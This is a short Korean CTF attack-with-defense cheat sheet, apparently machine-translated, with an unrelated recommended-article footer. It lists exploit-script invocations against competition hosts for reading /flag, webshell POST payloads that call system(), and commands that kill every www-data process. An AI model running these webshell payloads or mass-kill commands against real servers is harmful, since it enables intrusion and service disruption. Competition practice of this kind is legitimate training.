AWD 노트
1. 프레임 공격 스크립트 실행
테스트,공격npc
python run.py -m cqhk_exp2 -l 1 -t ctf.momomoxiaoxi.com:8815
본격 공격
python run.py -m cqhk_exp2 -c 'cat /flag' -c get_flag
2. 말을 죽이지 못한다
chmod 755 css
cd css
rm .d0xxxxxx.php & mkdir .doxxxxxx.php
chmod 777 ../css
ps -ef|grep 'www-data' | awk '{print $2}'| xargs kill -9
불사마 방식:
웹 셸에 쓰기.php
hackbar post
http://ctf.momomoxiaoxi.com:8802/css/webshell.php
post 매개 변수:
테스트:
aa=system("ls");
공식:
aa=system("ps -ef|grep 'www-data' | awk '{print $2}'| xargs kill -9");
3. 아파치 시작
/usr/sbin/apache2 -k start
공구
postman, hackbar
mamp,mac 버전 php+mysql 관리 도구
transmit,mac 버전 ftp 도구
burpsuite, 플러그인 Reissue Request Scripter
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
다양한 언어의 JSONJSON은 Javascript 표기법을 사용하여 데이터 구조를 레이아웃하는 데이터 형식입니다. 그러나 Javascript가 코드에서 이러한 구조를 나타낼 수 있는 유일한 언어는 아닙니다. 저는 일반적으로 '객체'{}...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.